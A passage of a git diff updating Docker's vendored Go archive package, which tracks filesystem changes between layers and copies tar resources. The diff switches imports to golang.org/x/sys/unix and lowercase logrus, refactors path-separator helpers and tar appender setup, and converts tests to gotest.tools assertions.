os.ModeSymlink}, } for _, v := range cases { if out := chmodTarEntry(v.in); out != v.expected { diff --git a/vendor/github.com/docker/docker/pkg/archive/changes.go b/vendor/github.com/docker/docker/pkg/archive/changes.go index c07d55cbd9..43734db5b1 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -13,10 +13,10 @@ import ( "syscall" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/pools" 
"github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) // ChangeType represents the change type. @@ -267,7 +267,7 @@ func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) { } for name, newChild := range info.children { - oldChild, _ := oldChildren[name] + oldChild := oldChildren[name] if oldChild != nil { // change? oldStat := oldChild.stat @@ -279,7 +279,7 @@ func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) { // breaks down is if some code intentionally hides a change by setting // back mtime if statDifferent(oldStat, newStat) || - bytes.Compare(oldChild.capability, newChild.capability) != 0 { + !bytes.Equal(oldChild.capability, newChild.capability) { change := Change{ Path: newChild.path(), Kind: ChangeModify, @@ -394,13 +394,8 @@ func ChangesSize(newDir string, changes []Change) int64 { func ExportChanges(dir string, changes []Change, uidMaps, gidMaps []idtools.IDMap) (io.ReadCloser, error) { reader, writer := io.Pipe() go func() { - ta := &tarAppender{ - TarWriter: tar.NewWriter(writer), - Buffer: pools.BufioWriter32KPool.Get(nil), - SeenFiles: make(map[uint64]string), - UIDMaps: uidMaps, - GIDMaps: gidMaps, - } + ta := newTarAppender(idtools.NewIDMappingsFromMaps(uidMaps, gidMaps), writer, nil) + // this buffer is needed for the duration of this piped stream defer pools.BufioWriter32KPool.Put(ta.Buffer) diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go index fc5a9dfdb9..78a5393c8e 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "bytes" @@ -10,6 +10,7 @@ import ( "unsafe" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" ) // walker is used to implement collectFileInfoForChanges on linux. 
Where this @@ -65,7 +66,7 @@ func walkchunk(path string, fi os.FileInfo, dir string, root *FileInfo) error { } parent := root.LookUp(filepath.Dir(path)) if parent == nil { - return fmt.Errorf("collectFileInfoForChanges: Unexpectedly no parent for %s", path) + return fmt.Errorf("walkchunk: Unexpectedly no parent for %s", path) } info := &FileInfo{ name: filepath.Base(path), @@ -233,7 +234,7 @@ func readdirnames(dirname string) (names []nameIno, err error) { // Refill the buffer if necessary if bufp >= nbuf { bufp = 0 - nbuf, err = syscall.ReadDirent(int(f.Fd()), buf) // getdents on linux + nbuf, err = unix.ReadDirent(int(f.Fd()), buf) // getdents on linux if nbuf < 0 { nbuf = 0 } @@ -255,12 +256,12 @@ func readdirnames(dirname string) (names []nameIno, err error) { return sl, nil } -// parseDirent is a minor modification of syscall.ParseDirent (linux version) +// parseDirent is a minor modification of unix.ParseDirent (linux version) // which returns {name,inode} pairs instead of just names. func parseDirent(buf []byte, names []nameIno) (consumed int, newnames []nameIno) { origlen := len(buf) for len(buf) > 0 { - dirent := (*syscall.Dirent)(unsafe.Pointer(&buf[0])) + dirent := (*unix.Dirent)(unsafe.Pointer(&buf[0])) buf = buf[dirent.Reclen:] if dirent.Ino == 0 { // File absent in directory. 
continue @@ -293,7 +294,7 @@ func OverlayChanges(layers []string, rw string) ([]Change, error) { func overlayDeletedFile(root, path string, fi os.FileInfo) (string, error) { if fi.Mode()&os.ModeCharDevice != 0 { s := fi.Sys().(*syscall.Stat_t) - if major(uint64(s.Rdev)) == 0 && minor(uint64(s.Rdev)) == 0 { + if unix.Major(uint64(s.Rdev)) == 0 && unix.Minor(uint64(s.Rdev)) == 0 { // nolint: unconvert return path, nil } } diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_other.go b/vendor/github.com/docker/docker/pkg/archive/changes_other.go index da70ed37c4..ba744741cd 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_other.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_other.go @@ -1,6 +1,6 @@ // +build !linux -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go index 095102e578..019a0250f3 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -7,16 +7,11 @@ import ( "io/ioutil" "os" "path" - "runtime" "sort" "testing" ) func TestHardLinkOrder(t *testing.T) { - //TODO Should run for Solaris - if runtime.GOOS == "solaris" { - t.Skip("gcp failures on Solaris") - } names := []string{"file1.txt", "file2.txt", "file3.txt"} msg := []byte("Hey y'all") @@ -117,7 +112,7 @@ func (th tarHeaders) Less(i, j int) bool { return th[i].Name < th[j].Name } func walkHeaders(r io.Reader) ([]tar.Header, error) { t := tar.NewReader(r) - headers := []tar.Header{} + var headers []tar.Header for { hdr, err := t.Next() if err != nil { diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_test.go 
b/vendor/github.com/docker/docker/pkg/archive/changes_test.go index eae1d022c7..f2527cd936 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "io/ioutil" @@ -11,6 +11,8 @@ import ( "time" "github.com/docker/docker/pkg/system" + "gotest.tools/assert" + "gotest.tools/skip" ) func max(x, y int) int { @@ -21,15 +23,7 @@ func max(x, y int) int { } func copyDir(src, dst string) error { - cmd := exec.Command("cp", "-a", src, dst) - if runtime.GOOS == "solaris" { - cmd = exec.Command("gcp", "-a", src, dst) - } - - if err := cmd.Run(); err != nil { - return err - } - return nil + return exec.Command("cp", "-a", src, dst).Run() } type FileType uint32 @@ -49,63 +43,62 @@ type FileData struct { func createSampleDir(t *testing.T, root string) { files := []FileData{ - {Regular, "file1", "file1\n", 0600}, - {Regular, "file2", "file2\n", 0666}, - {Regular, "file3", "file3\n", 0404}, - {Regular, "file4", "file4\n", 0600}, - {Regular, "file5", "file5\n", 0600}, - {Regular, "file6", "file6\n", 0600}, - {Regular, "file7", "file7\n", 0600}, - {Dir, "dir1", "", 0740}, - {Regular, "dir1/file1-1", "file1-1\n", 01444}, - {Regular, "dir1/file1-2", "file1-2\n", 0666}, - {Dir, "dir2", "", 0700}, - {Regular, "dir2/file2-1", "file2-1\n", 0666}, - {Regular, "dir2/file2-2", "file2-2\n", 0666}, - {Dir, "dir3", "", 0700}, - {Regular, "dir3/file3-1", "file3-1\n", 0666}, - {Regular, "dir3/file3-2", "file3-2\n", 0666}, - {Dir, "dir4", "", 0700}, - {Regular, "dir4/file3-1", "file4-1\n", 0666}, - {Regular, "dir4/file3-2", "file4-2\n", 0666}, - {Symlink, "symlink1", "target1", 0666}, - {Symlink, "symlink2", "target2", 0666}, - {Symlink, "symlink3", root + "/file1", 0666}, - {Symlink, "symlink4", root + "/symlink3", 0666}, - {Symlink, "dirSymlink", root + "/dir1", 0740}, - } + {filetype: Regular, path: "file1", 
contents: "file1\n", permissions: 0600}, + {filetype: Regular, path: "file2", contents: "file2\n", permissions: 0666}, + {filetype: Regular, path: "file3", contents: "file3\n", permissions: 0404}, + {filetype: Regular, path: "file4", contents: "file4\n", permissions: 0600}, + {filetype: Regular, path: "file5", contents: "file5\n", permissions: 0600}, + {filetype: Regular, path: "file6", contents: "file6\n", permissions: 0600}, + {filetype: Regular, path: "file7", contents: "file7\n", permissions: 0600}, + {filetype: Dir, path: "dir1", contents: "", permissions: 0740}, + {filetype: Regular, path: "dir1/file1-1", contents: "file1-1\n", permissions: 01444}, + {filetype: Regular, path: "dir1/file1-2", contents: "file1-2\n", permissions: 0666}, + {filetype: Dir, path: "dir2", contents: "", permissions: 0700}, + {filetype: Regular, path: "dir2/file2-1", contents: "file2-1\n", permissions: 0666}, + {filetype: Regular, path: "dir2/file2-2", contents: "file2-2\n", permissions: 0666}, + {filetype: Dir, path: "dir3", contents: "", permissions: 0700}, + {filetype: Regular, path: "dir3/file3-1", contents: "file3-1\n", permissions: 0666}, + {filetype: Regular, path: "dir3/file3-2", contents: "file3-2\n", permissions: 0666}, + {filetype: Dir, path: "dir4", contents: "", permissions: 0700}, + {filetype: Regular, path: "dir4/file3-1", contents: "file4-1\n", permissions: 0666}, + {filetype: Regular, path: "dir4/file3-2", contents: "file4-2\n", permissions: 0666}, + {filetype: Symlink, path: "symlink1", contents: "target1", permissions: 0666}, + {filetype: Symlink, path: "symlink2", contents: "target2", permissions: 0666}, + {filetype: Symlink, path: "symlink3", contents: root + "/file1", permissions: 0666}, + {filetype: Symlink, path: "symlink4", contents: root + "/symlink3", permissions: 0666}, + {filetype: Symlink, path: "dirSymlink", contents: root + "/dir1", permissions: 0740}, + } + provisionSampleDir(t, root, files) +} +func provisionSampleDir(t *testing.T, root string, files 
[]FileData) { now := time.Now() for _, info := range files { p := path.Join(root, info.path) if info.filetype == Dir { - if err := os.MkdirAll(p, info.permissions); err != nil { - t.Fatal(err) - } + err := os.MkdirAll(p, info.permissions) + assert.NilError(t, err) } else if info.filetype == Regular { - if err := ioutil.WriteFile(p, []byte(info.contents), info.permissions); err != nil { - t.Fatal(err) - } + err := ioutil.WriteFile(p, []byte(info.contents), info.permissions) + assert.NilError(t, err) } else if info.filetype == Symlink { - if err := os.Symlink(info.contents, p); err != nil { - t.Fatal(err) - } + err := os.Symlink(info.contents, p) + assert.NilError(t, err) } if info.filetype != Symlink { // Set a consistent ctime, atime for all files and dirs - if err := system.Chtimes(p, now, now); err != nil { - t.Fatal(err) - } + err := system.Chtimes(p, now, now) + assert.NilError(t, err) } } } func TestChangeString(t *testing.T) { - modifiyChange := Change{"change", ChangeModify} - toString := modifiyChange.String() + modifyChange := Change{"change", ChangeModify} + toString := modifyChange.String() if toString != "C change" { - t.Fatalf("String() of a change with ChangeModifiy Kind should have been %s but was %s", "C change", toString) + t.Fatalf("String() of a change with ChangeModify Kind should have been %s but was %s", "C change", toString) } addChange := Change{"change", ChangeAdd} toString = addChange.String() @@ -126,20 +119,14 @@ func TestChangesWithNoChanges(t *testing.T) { t.Skip("symlinks on Windows") } rwLayer, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(rwLayer) layer, err := ioutil.TempDir("", "docker-changes-test-layer") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(layer) createSampleDir(t, layer) changes, err := Changes([]string{layer}, rwLayer) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if len(changes) 
!= 0 { t.Fatalf("Changes with no difference should have detect no changes, but detected %d", len(changes)) } @@ -153,18 +140,14 @@ func TestChangesWithChanges(t *testing.T) { } // Mock the readonly layer layer, err := ioutil.TempDir("", "docker-changes-test-layer") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(layer) createSampleDir(t, layer) os.MkdirAll(path.Join(layer, "dir1/subfolder"), 0740) // Mock the RW layer rwLayer, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(rwLayer) // Create a folder in RW layer @@ -181,9 +164,7 @@ func TestChangesWithChanges(t *testing.T) { ioutil.WriteFile(newFile, []byte{}, 0740) changes, err := Changes([]string{layer}, rwLayer) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) expectedChanges := []Change{ {"/dir1", ChangeModify}, @@ -203,6 +184,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { t.Skip("symlinks on Windows") } baseLayer, err := ioutil.TempDir("", "docker-changes-test.") + assert.NilError(t, err) defer os.RemoveAll(baseLayer) dir3 := path.Join(baseLayer, "dir1/dir2/dir3") @@ -212,6 +194,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { ioutil.WriteFile(file, []byte("hello"), 0666) layer, err := ioutil.TempDir("", "docker-changes-test2.") + assert.NilError(t, err) defer os.RemoveAll(layer) // Test creating a new file @@ -224,9 +207,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { ioutil.WriteFile(file, []byte("bye"), 0666) changes, err := Changes([]string{baseLayer}, layer) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) expectedChanges := []Change{ {"/dir1/dir2/dir3", ChangeModify}, @@ -236,6 +217,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { // Now test changing a file layer, err = ioutil.TempDir("", "docker-changes-test3.") + assert.NilError(t, err) defer os.RemoveAll(layer) if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil { @@ 
-246,9 +228,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { ioutil.WriteFile(file, []byte("bye"), 0666) changes, err = Changes([]string{baseLayer}, layer) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) expectedChanges = []Change{ {"/dir1/dir2/dir3/file.txt", ChangeModify}, @@ -260,25 +240,19 @@ func TestChangesWithChangesGH13590(t *testing.T) { func TestChangesDirsEmpty(t *testing.T) { // TODO Windows. There may be a way of running this, but turning off for now // as createSampleDir uses symlinks. - // TODO Should work for Solaris - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip("symlinks on Windows; gcp failure on Solaris") + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") } src, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(src) createSampleDir(t, src) dst := src + "-copy" - if err := copyDir(src, dst); err != nil { - t.Fatal(err) - } + err = copyDir(src, dst) + assert.NilError(t, err) defer os.RemoveAll(dst) changes, err := ChangesDirs(dst, src) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if len(changes) != 0 { t.Fatalf("Reported changes for identical dirs: %v", changes) @@ -289,108 +263,86 @@ func TestChangesDirsEmpty(t *testing.T) { func mutateSampleDir(t *testing.T, root string) { // Remove a regular file - if err := os.RemoveAll(path.Join(root, "file1")); err != nil { - t.Fatal(err) - } + err := os.RemoveAll(path.Join(root, "file1")) + assert.NilError(t, err) // Remove a directory - if err := os.RemoveAll(path.Join(root, "dir1")); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "dir1")) + assert.NilError(t, err) // Remove a symlink - if err := os.RemoveAll(path.Join(root, "symlink1")); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "symlink1")) + assert.NilError(t, err) // Rewrite a file - if err := ioutil.WriteFile(path.Join(root, "file2"), 
[]byte("fileNN\n"), 0777); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(path.Join(root, "file2"), []byte("fileNN\n"), 0777) + assert.NilError(t, err) // Replace a file - if err := os.RemoveAll(path.Join(root, "file3")); err != nil { - t.Fatal(err) - } - if err := ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "file3")) + assert.NilError(t, err) + err = ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404) + assert.NilError(t, err) // Touch file - if err := system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil { - t.Fatal(err) - } + err = system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second)) + assert.NilError(t, err) // Replace file with dir - if err := os.RemoveAll(path.Join(root, "file5")); err != nil { - t.Fatal(err) - } - if err := os.MkdirAll(path.Join(root, "file5"), 0666); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "file5")) + assert.NilError(t, err) + err = os.MkdirAll(path.Join(root, "file5"), 0666) + assert.NilError(t, err) // Create new file - if err := ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777) + assert.NilError(t, err) // Create new dir - if err := os.MkdirAll(path.Join(root, "dirnew"), 0766); err != nil { - t.Fatal(err) - } + err = os.MkdirAll(path.Join(root, "dirnew"), 0766) + assert.NilError(t, err) // Create a new symlink - if err := os.Symlink("targetnew", path.Join(root, "symlinknew")); err != nil { - t.Fatal(err) - } + err = os.Symlink("targetnew", path.Join(root, "symlinknew")) + assert.NilError(t, err) // Change a symlink - if err := os.RemoveAll(path.Join(root, "symlink2")); err != nil { - t.Fatal(err) - } - if err := os.Symlink("target2change", path.Join(root, 
"symlink2")); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "symlink2")) + assert.NilError(t, err) + + err = os.Symlink("target2change", path.Join(root, "symlink2")) + assert.NilError(t, err) // Replace dir with file - if err := os.RemoveAll(path.Join(root, "dir2")); err != nil { - t.Fatal(err) - } - if err := ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777); err != nil { - t.Fatal(err) - } + err = os.RemoveAll(path.Join(root, "dir2")) + assert.NilError(t, err) + err = ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777) + assert.NilError(t, err) // Touch dir - if err := system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil { - t.Fatal(err) - } + err = system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second)) + assert.NilError(t, err) } func TestChangesDirsMutated(t *testing.T) { // TODO Windows. There may be a way of running this, but turning off for now // as createSampleDir uses symlinks. - // TODO Should work for Solaris - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip("symlinks on Windows; gcp failures on Solaris") + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") } src, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) createSampleDir(t, src) dst := src + "-copy" - if err := copyDir(src, dst); err != nil { - t.Fatal(err) - } + err = copyDir(src, dst) + assert.NilError(t, err) defer os.RemoveAll(src) defer os.RemoveAll(dst) mutateSampleDir(t, dst) changes, err := ChangesDirs(dst, src) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) sort.Sort(changesByPath(changes)) @@ -431,46 +383,33 @@ func TestChangesDirsMutated(t *testing.T) { func TestApplyLayer(t *testing.T) { // TODO Windows. There may be a way of running this, but turning off for now // as createSampleDir uses symlinks. 
- // TODO Should work for Solaris - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip("symlinks on Windows; gcp failures on Solaris") + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") } src, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) createSampleDir(t, src) defer os.RemoveAll(src) dst := src + "-copy" - if err := copyDir(src, dst); err != nil { - t.Fatal(err) - } + err = copyDir(src, dst) + assert.NilError(t, err) mutateSampleDir(t, dst) defer os.RemoveAll(dst) changes, err := ChangesDirs(dst, src) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) layer, err := ExportChanges(dst, changes, nil, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) layerCopy, err := NewTempArchive(layer, "") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - if _, err := ApplyLayer(src, layerCopy); err != nil { - t.Fatal(err) - } + _, err = ApplyLayer(src, layerCopy) + assert.NilError(t, err) changes2, err := ChangesDirs(src, dst) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if len(changes2) != 0 { t.Fatalf("Unexpected differences after reapplying mutation: %v", changes2) @@ -484,26 +423,18 @@ func TestChangesSizeWithHardlinks(t *testing.T) { t.Skip("hardlinks on Windows") } srcDir, err := ioutil.TempDir("", "docker-test-srcDir") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(srcDir) destDir, err := ioutil.TempDir("", "docker-test-destDir") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(destDir) creationSize, err := prepareUntarSourceDirectory(100, destDir, true) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) changes, err := ChangesDirs(destDir, srcDir) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) got := ChangesSize(destDir, changes) if got != int64(creationSize) { @@ -530,15 +461,15 @@ func 
TestChangesSizeWithOnlyDeleteChanges(t *testing.T) { func TestChangesSize(t *testing.T) { parentPath, err := ioutil.TempDir("", "docker-changes-test") + assert.NilError(t, err) defer os.RemoveAll(parentPath) addition := path.Join(parentPath, "addition") - if err := ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744) + assert.NilError(t, err) modification := path.Join(parentPath, "modification") - if err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744) + assert.NilError(t, err) + changes := []Change{ {Path: "addition", Kind: ChangeAdd}, {Path: "modification", Kind: ChangeModify}, @@ -550,6 +481,7 @@ func TestChangesSize(t *testing.T) { } func checkChanges(expectedChanges, changes []Change, t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") sort.Sort(changesByPath(expectedChanges)) sort.Sort(changesByPath(changes)) for i := 0; i < max(len(changes), len(expectedChanges)); i++ { diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go index 3778b732cf..c06a209d8e 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go @@ -1,12 +1,13 @@ // +build !windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "os" "syscall" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" ) func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { @@ -16,7 +17,7 @@ func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { oldStat.GID() != newStat.GID() || oldStat.Rdev() != newStat.Rdev() || // Don't look at size for dirs, its not a good measure of change - (oldStat.Mode()&syscall.S_IFDIR != 
syscall.S_IFDIR && + (oldStat.Mode()&unix.S_IFDIR != unix.S_IFDIR && (!sameFsTimeSpec(oldStat.Mtim(), newStat.Mtim()) || (oldStat.Size() != newStat.Size()))) { return true } @@ -24,11 +25,11 @@ func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { } func (info *FileInfo) isDir() bool { - return info.parent == nil || info.stat.Mode()&syscall.S_IFDIR != 0 + return info.parent == nil || info.stat.Mode()&unix.S_IFDIR != 0 } func getIno(fi os.FileInfo) uint64 { - return uint64(fi.Sys().(*syscall.Stat_t).Ino) + return fi.Sys().(*syscall.Stat_t).Ino } func hasHardlinks(fi os.FileInfo) bool { diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_windows.go b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go index af94243fc4..6555c01368 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_windows.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "os" @@ -9,16 +9,16 @@ import ( func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool { // Don't look at size for dirs, its not a good measure of change - if oldStat.ModTime() != newStat.ModTime() || + if oldStat.Mtim() != newStat.Mtim() || oldStat.Mode() != newStat.Mode() || - oldStat.Size() != newStat.Size() && !oldStat.IsDir() { + oldStat.Size() != newStat.Size() && !oldStat.Mode().IsDir() { return true } return false } func (info *FileInfo) isDir() bool { - return info.parent == nil || info.stat.IsDir() + return info.parent == nil || info.stat.Mode().IsDir() } func getIno(fi os.FileInfo) (inode uint64) { diff --git a/vendor/github.com/docker/docker/pkg/archive/copy.go b/vendor/github.com/docker/docker/pkg/archive/copy.go index 0614c67cec..d0f13ca79b 100644 --- a/vendor/github.com/docker/docker/pkg/archive/copy.go +++ b/vendor/github.com/docker/docker/pkg/archive/copy.go @@ -1,4 +1,4 @@ -package archive +package archive // import 
"github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -9,8 +9,8 @@ import ( "path/filepath" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) // Errors used or returned by this file. @@ -27,23 +27,23 @@ var ( // path (from before being processed by utility functions from the path or // filepath stdlib packages) ends with a trailing `/.` or `/`. If the cleaned // path already ends in a `.` path segment, then another is not added. If the -// clean path already ends in a path separator, then another is not added. -func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string { +// clean path already ends in the separator, then another is not added. +func PreserveTrailingDotOrSeparator(cleanedPath string, originalPath string, sep byte) string { // Ensure paths are in platform semantics - cleanedPath = normalizePath(cleanedPath) - originalPath = normalizePath(originalPath) + cleanedPath = strings.Replace(cleanedPath, "/", string(sep), -1) + originalPath = strings.Replace(originalPath, "/", string(sep), -1) if !specifiesCurrentDir(cleanedPath) && specifiesCurrentDir(originalPath) { - if !hasTrailingPathSeparator(cleanedPath) { + if !hasTrailingPathSeparator(cleanedPath, sep) { // Add a separator if it doesn't already end with one (a cleaned // path would only end in a separator if it is the root). - cleanedPath += string(filepath.Separator) + cleanedPath += string(sep) } cleanedPath += "." 
} - if !hasTrailingPathSeparator(cleanedPath) && hasTrailingPathSeparator(originalPath) { - cleanedPath += string(filepath.Separator) + if !hasTrailingPathSeparator(cleanedPath, sep) && hasTrailingPathSeparator(originalPath, sep) { + cleanedPath += string(sep) } return cleanedPath @@ -52,14 +52,14 @@ func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string { // assertsDirectory returns whether the given path is // asserted to be a directory, i.e., the path ends with // a trailing '/' or `/.`, assuming a path separator of `/`. -func assertsDirectory(path string) bool { - return hasTrailingPathSeparator(path) || specifiesCurrentDir(path) +func assertsDirectory(path string, sep byte) bool { + return hasTrailingPathSeparator(path, sep) || specifiesCurrentDir(path) } // hasTrailingPathSeparator returns whether the given // path ends with the system's path separator character. -func hasTrailingPathSeparator(path string) bool { - return len(path) > 0 && os.IsPathSeparator(path[len(path)-1]) +func hasTrailingPathSeparator(path string, sep byte) bool { + return len(path) > 0 && path[len(path)-1] == sep } // specifiesCurrentDir returns whether the given path specifies @@ -72,10 +72,10 @@ func specifiesCurrentDir(path string) bool { // basename by first cleaning the path but preserves a trailing "." if the // original path specified the current directory. func SplitPathDirEntry(path string) (dir, base string) { - cleanedPath := filepath.Clean(normalizePath(path)) + cleanedPath := filepath.Clean(filepath.FromSlash(path)) if specifiesCurrentDir(path) { - cleanedPath += string(filepath.Separator) + "." + cleanedPath += string(os.PathSeparator) + "." } return filepath.Dir(cleanedPath), filepath.Base(cleanedPath) @@ -106,19 +106,24 @@ func TarResourceRebase(sourcePath, rebaseName string) (content io.ReadCloser, er // Separate the source path between its directory and // the entry in that directory which we are archiving. 
sourceDir, sourceBase := SplitPathDirEntry(sourcePath) - - filter := []string{sourceBase} + opts := TarResourceRebaseOpts(sourceBase, rebaseName) logrus.Debugf("copying %q from %q", sourceBase, sourceDir) + return TarWithOptions(sourceDir, opts) +} - return TarWithOptions(sourceDir, &TarOptions{ +// TarResourceRebaseOpts does not preform the Tar, but instead just creates the rebase +// parameters to be sent to TarWithOptions (the TarOptions struct) +func TarResourceRebaseOpts(sourceBase string, rebaseName string) *TarOptions { + filter := []string{sourceBase} + return &TarOptions{ Compression: Uncompressed, IncludeFiles: filter, IncludeSourceDir: true, RebaseNames: map[string]string{ sourceBase: rebaseName, }, - }) + } } // CopyInfo holds basic info about the source @@ -218,7 +223,7 @@ func CopyInfoDestinationPath(path string) (info CopyInfo, err error) { // Ensure destination parent dir exists. dstParent, _ := SplitPathDirEntry(path) - parentDirStat, err := os.Lstat(dstParent) + parentDirStat, err := os.Stat(dstParent) if err != nil { return CopyInfo{}, err } @@ -281,7 +286,7 @@ func PrepareArchiveCopy(srcContent io.Reader, srcInfo, dstInfo CopyInfo) (dstDir srcBase = srcInfo.RebaseName } return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil - case assertsDirectory(dstInfo.Path): + case assertsDirectory(dstInfo.Path, os.PathSeparator): // The destination does not exist and is asserted to be created as a // directory, but the source content is not a directory. 
